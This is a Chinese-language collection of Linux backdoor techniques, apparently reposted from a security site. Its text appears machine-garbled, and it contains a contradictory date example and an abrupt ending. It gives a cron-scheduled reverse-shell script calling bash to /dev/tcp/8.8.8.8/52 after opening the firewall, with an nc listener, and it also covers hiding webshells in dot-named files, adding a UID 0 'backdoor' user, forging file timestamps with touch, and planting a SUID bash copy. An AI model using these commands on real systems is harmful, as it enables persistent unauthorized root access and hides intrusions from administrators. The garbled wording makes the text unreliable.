Linux后门整理合集

"Unix Bash 远程控制侧门 

介绍 

运用 Unix/Linux 内置的 Bash 和 Crond 建立远程控制作用，维持反跳发布到内网ip设备。

运用方式 

先建立 /etc/xxxx 脚本制作文档（姓名自个改），运用该脚本制作开展反跳。下列脚本制作意味着自动式反跳到 8.8.8.8 的 52 端口号。

nano /etc/xxxx

#!/bin/bash

if netstat -ano|grep -v grep | grep ""8.8.8.8"">/dev/null

then

echo ""Ok"">/dev/null

else

/sbin/iptables --policy INPUT ACCEPT

/sbin/iptables --policy OUTPUT ACCEPT

bash -i >& /dev/tcp/8.8.8.8/52 0>&1

fi

chmod +sx /etc/xxxx

随后人们必须改动一下下 /etc/crontab 让它定时重启。

nano /etc/crontab     在 /etc/crontab 文档末添加这每行。意味着每 1 分鐘实行多次。

*/1 * * * * root /etc/xxxx 

最终重新启动一下下 crond 的服务项目。（不一样发行版重新启动方法不同，自主查寻）

service cron reload

service cron start

随后在 8.8.8.8 的网络服务器上应用 NC 接受 Shell 只能。

nc -vv -Lp 52

Linux/Unix 藏文档和文件夹名称 

Linux/Unix 下想藏 Webshell 或是侧门哪些的，能够运用一下下隐藏文件夹和文档。

方式一 

例如建立1个姓名打头带 . 的 Webshell 或是文件夹名称，默认设置状况下是不容易显示信息出去的，电脑浏览器浏览的那时候天赋加点浏览就行。（查询方式：ls -a）

touch .webshell.Python    建立姓名为 .webshell.Python 的文档

mkdir .backdoor/       建立姓名为 .backdoor 的文件夹名称

最终方式 

在管理人员喝醉了或是头脑转不回来的状况下，是絕對不容易发觉的！最少我用了这么多年是没好多个发觉的。

是文档得话电脑浏览器浏览立即输 有限责任公司 就行，文件目录同理。

touch 有限责任公司       建立姓名为 有限责任公司 的文档

mkdir 有限责任公司       建立姓名为 有限责任公司 的文件夹名称

实际效果如图所示：

文中《Linux侧门梳理合辑（脉率强烈推荐）》由armyzer0精英团队原創网上投稿安全性脉率，创作者老师机，安全性脉率SecPulse.Com独家代理发布文中，如必须转截，请先联络安全性脉率受权；没经受权切勿转截。 

Linux/Unix 加上 UID 为 0 的客户 

介绍 

在 Unix 管理体系下，UID 为 0 就是说 root 管理权限。因此渗入的那时候能够加上1个 UID 为 0 的客户做为侧门。

运用方式 

useradd -o -u 0 backdoor

Linux/Unix 改动文档时间戳 

介绍 

Unix 下藏侧门必需要改动時间，不然非常容易被发觉，立即运用 touch 就就行了。

例如参照 index.Python 的時间，再赋给 webshell.Python，結果2个文档的時间就相同了。

运用方式 

touch -r index.Python webshell.Python

或是立即将时间戳改动成某年某月某日。给出 2012 年 08 月 81 日。

touch -t 1401021042.30 webshell.Python

系统软件自然环境:

dawg:~# uname -a

Linux dawg 2.4.20-1-386 #3 Sat Mar 26 13:12:50 EST 2007 i686 GNU/Linux

SUID shell 

运用方式  

最先, 先转换变成root客户，并实行下列的指令:

dawg:~# Cp /bin/bash /.woot

dawg:~# chmod 4755 /.woot

dawg:~# ls -aL /.woot

-rwsr-xr-x 1 root root 690668 Jul 28 18:13 /.woot

或许, 你还可以起别的更具有掩藏性的姓名,我想要猥亵并随机应变的你，确实能想了许多好听的名字的。

文档前边的那一点儿也